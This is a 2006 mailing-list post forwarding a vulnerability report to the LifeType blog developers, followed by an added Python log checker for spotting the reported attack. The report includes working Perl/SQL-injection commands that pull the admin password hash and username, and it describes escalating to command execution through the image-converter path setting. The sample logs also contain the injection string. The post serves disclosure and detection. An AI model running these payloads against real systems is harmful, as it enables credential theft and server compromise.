[pLog-svn] Fwd: Security problem
Oscar Renalias
oscar at renalias.net
Mon Jul 3 15:57:45 GMT 2006
Can somebody quickly investigate this?
---------- Forwarded message ----------
From: A. Ramos <aramosf at unsec.net>
Date: Jul 3, 2006 5:45 PM
Subject: Security problem
To: contact at lifetype.net
Hello :-)
There is one SQL injection in the latest version of LifeType:
To get md5 passwd:
perl -MLWP::Simple -e "getprint
'http://localhost/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/*&blogId=1'"
| perl -ne 'print "password: ".$1."\n" if /articleId=(\w*).*h3/'
To get admin username:
perl -MLWP::Simple -e "getprint
'http://localhost/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/*&blogId=1'"
| perl -ne 'print "admin: ".$1."\n" if /articleId=(\w*).*h3/'
And if you can access the admin control panel, you can run commands
on the system by changing the value of /usr/bin/convert and putting in your
own command. Upload some picture and wait for it to be resized with the evil command.
I think there are more bugs but I haven't time to check for more.
Thank you.
--
A. Ramos <aka dab>
mailto: <aramosf at unsec.net>
http://www.unsec.net
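
Added example, not part of the original message or of LifeType's code: a log check for finding requests like the ones reported above, flagging any `Date` parameter that is not purely numeric. It assumes Apache combined-style access logs and that legitimate `Date` values contain digits only (as in `200607`); the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration; not taken from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Jul/2006:15:40:01 +0000] "GET /index.php?op=Default&Date=200607&blogId=1 HTTP/1.1" 200 5120
192.0.2.77 - - [03/Jul/2006:15:41:12 +0000] "GET /index.php?op=Default&Date=200607'%20UNION%20SELECT%201,password,1%20FROM%20lt_users/*&blogId=1 HTTP/1.1" 200 4980
192.0.2.10 - - [03/Jul/2006:15:42:30 +0000] "GET /index.php?op=ViewArticle&articleId=12&blogId=1 HTTP/1.1" 200 7300
192.0.2.78 - - [03/Jul/2006:15:43:02 +0000] "GET /index.php?op=Default&Date=200607%2527&blogId=1 HTTP/1.1" 200 5120
"""

# client, timestamp, method, request target, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: a legitimate Date value is 1 to 8 digits (e.g. 200607).
DATE_OK = re.compile(r"\d{1,8}")
# Secondary hint only; the allowlist above is what decides a hit.
SQL_HINT = re.compile(r"\b(union|select|from|where)\b|/\*|--|'", re.I)


def suspicious_date_requests(log_text):
    """Return (client, timestamp, decoded Date, has_sql_tokens) for every
    request whose Date parameter is not purely numeric."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, ts, _method, target, _status = m.groups()
        # parse_qs URL-decodes each value once, as the web server would.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in params.get("Date", []):
            if not DATE_OK.fullmatch(value):
                hits.append((client, ts, value, bool(SQL_HINT.search(value))))
    return hits


if __name__ == "__main__":
    for hit in suspicious_date_requests(SAMPLE_LOG):
        print(hit)
```

The last sample line carries a double-encoded quote, which a keyword signature would miss but the digits-only allowlist still flags.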